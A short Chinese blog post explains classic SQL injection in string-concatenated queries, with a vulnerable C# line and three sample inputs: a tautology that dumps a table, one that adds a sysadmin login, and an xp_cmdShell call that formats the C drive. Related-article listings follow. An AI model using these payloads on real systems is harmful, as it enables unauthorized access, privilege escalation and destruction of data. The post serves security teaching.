经典SQL注入攻击法

最新推荐文章于 2024-03-13 09:41:16 发布
最新推荐文章于 2024-03-13 09:41:16 发布
阅读量1.1k 收藏 1
点赞数
文章标签: sql textbox string 数据库 服务器 编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fcc_ecjtu/article/details/1209587
版权
 我们在编程过程中,经常会把用户输入的数据拼成一个SQL语句,然后直接发送给服务器执行,比如:

string SqlStr = "select * from customers where CompanyName Like '%" + textBox1.Text + "%'";

这样的字符串连接可能会带来灾难性的结果,比如用户在文本框中输入:

a' or 1=1 --

那么SqlStr的内容就是:

select * from customers where CompanyName like '%a' or 1=1 --%'

这样,整个customers数据表的所有数据就会被全部检索出来,因为1=1永远true,而且最后的百分号和单引号被短横杠注释掉了。

如果用户在文本框中输入:

a' EXEC sp_addlogin 'John' ,'123' EXEC sp_addsrvrolemember 'John','sysadmin' --

那么SqlStr的内容就是:

select * from customers where CompanyName like '%a' EXEC sp_addlogin 'John','123' EXEC sp_addsrvrolemember 'John','sysadmin' --

这个语句是在后台数据库中增加一个用户John,密码123,而且是一个sysadmin账号,相当于sa的权限。

如果用户在文本框中输入:

a' EXEC xp_cmdShell('format c:/y') --

运行之后好像是格式化C盘!

fcc_ecjtu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入漏洞复现:探索不同类型的注入攻击
weixin_43263566的博客
08-26 1369
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
【网络安全】SQL注入原理及常见攻击简析
等风来
04-18 6773
因此,攻击者可以在用户名或密码中添加 --,来注释掉后面的字符串,从而绕过过滤器的检测。攻击者不停地尝试不同的SQL语句,观察程序的响应时间,从而判断SQL语句是否正确,进而获取数据库中的敏感信息。该方的基本原理是,在输入框中输入一个带有单引号的字符串,如果应用程序对输入参数没有进行正确的过滤和转义,则会发生语错误,进而证明存在 SQL 注入漏洞。基于布尔盲注的SQL注入攻击是一种利用目标Web应用程序对SQL查询条件正确/错误响应的不同表现来推测查询语句的正确性,从而获取数据库中敏感信息的攻击方式。
SQL注入攻击
人生何适不艰难 赖是胸中万斛宽
06-03 1186
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入
Java程序员从笨鸟到菜鸟之(一百零二)sql注入攻击详解(三)sql注入解决办...
红太阳照大地
11-05 860
在前面的博客中,我们详细介绍了: sql注入攻击详解(二)sql注入过程详解 sql注入攻击详解(一)sql注入原理详解 我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入的解决办。怎么来解决和防范sql注入,由于本人主要是搞javaweb开发的小程序员,所以这里我只讲一下有关于javaweb的防止办。其实对于其他的,思路基本相似。下面我们先...
SQL注入常见的攻击(一)
ThegreatHaige的博客
10-22 3999
sql注入 一.基本概述及分析 定义:SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。 利用条件分析: 可控参数 参数与数据库之间具有传入 回显 <?php header("Con
常见SQL注入攻击方式
Jo_kong的博客
11-21 8892
本文主要针对SQL注入的含义、以及如何进行SQL注入和如何预防SQL注入,让小伙伴有个了解。了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,好啦,话不多说,进入正题~ 如何理解SQL注入攻击)? 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将(恶意的)...
数据库 -- SQL注入攻击
_天涯__的博客
12-07 1609
SQL注入攻击_百度百科 概念 SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入攻击属于数据库安全攻击手段之一,可以通过数...
JSP 防范SQL注入攻击分析
10-30
在网络安全领域中,SQL注入攻击是一种常见的攻击手段,其主要目的是利用网站应用程序的输入漏洞,执行恶意的SQL命令,进而控制数据库服务器。在本文中,作者以自己的亲身体验,详细地分析了SQL注入攻击的原理和防范...
SQL注入攻击
03-30
### SQL注入攻击 #### 知识点一:SQL注入概念与原理 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句,利用应用程序对用户输入处理不当的情况来操纵数据库执行非预期的操作。...
sql注入攻击sql注入攻击.rar
08-21
"sql注入攻击.sql注入攻击.rar"这个文件很可能是关于如何预防和应对SQL注入攻击的教学资料。 在了解SQL注入攻击之前,我们首先要明白SQL(Structured Query Language)是用于管理和处理关系数据库的标准语言。...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入攻击常见方式及测试方
一个准备迈入社会的white的博客
06-24 4501
SQL注入攻击常见方式及测试方
SQL注入攻击实例讲解
体会技术牛人的高傲
11-08 1698
 刚刚高中的一位同学问我一道笔试题:请简述SQL注入攻击及其原理。 (Q:攻击?难道是做黑可吗??)可以把这种行为理解成黑客行径,因为这样做的目的就是“非获取”。 (Q:怎么做?)可以按照我下面的步骤一步一步来,大家也就当一回“黑客”了。(P.S. 这可是我“独家研制”的啊~) string starFire = "星火" ; // 瞧我C#学的多好《starFire英语》大家都应该了解吧(别
【网络安全】SQL注入_sql注入攻击实例(必学系列)
最新发布
weixin_57514792的博客
03-13 2175
网络安全-SQL注入
典型SQL 注入过程
WYZSC的专栏
12-02 1204
典型SQL 注入过程http://soft.zdnet.com.cn/software_zone/2009/1130/1528942.shtml
SQL注入攻击
pairsfish的专栏(你知道东方在哪一边)
09-28 1488
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的
SQLSQL注入攻击(一)
Zachary
07-21 5042
【前言 】 前一段时间在接触压力测试的时候,多多少少也听到其他的测试方,自己对这个安全测试挺感兴趣的。就自己在网上找了些资料总结了下,请多多指正!! 【正文 】 一、 SQL注入攻击的背景: 在信息技术高速发展的今天,各种各样复杂的威胁网站技术也同时快速的“发展”,让人们防不胜防。他们利用网络的安全漏洞进行各种恶意活动,如账号盗用、私密信息截获、带宽资源占用等。严重破坏了网络的正常健康运...
SQL注入攻击详解与安全防护策略
1. **简单的SQL注入攻击**: - **盲注**:当应用返回的信息有限时,攻击者可以通过测试不同的条件来判断数据是否存在或结构如何。 - **基于错误的注入**:利用应用程序的错误信息揭示数据库结构和数据。 - **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值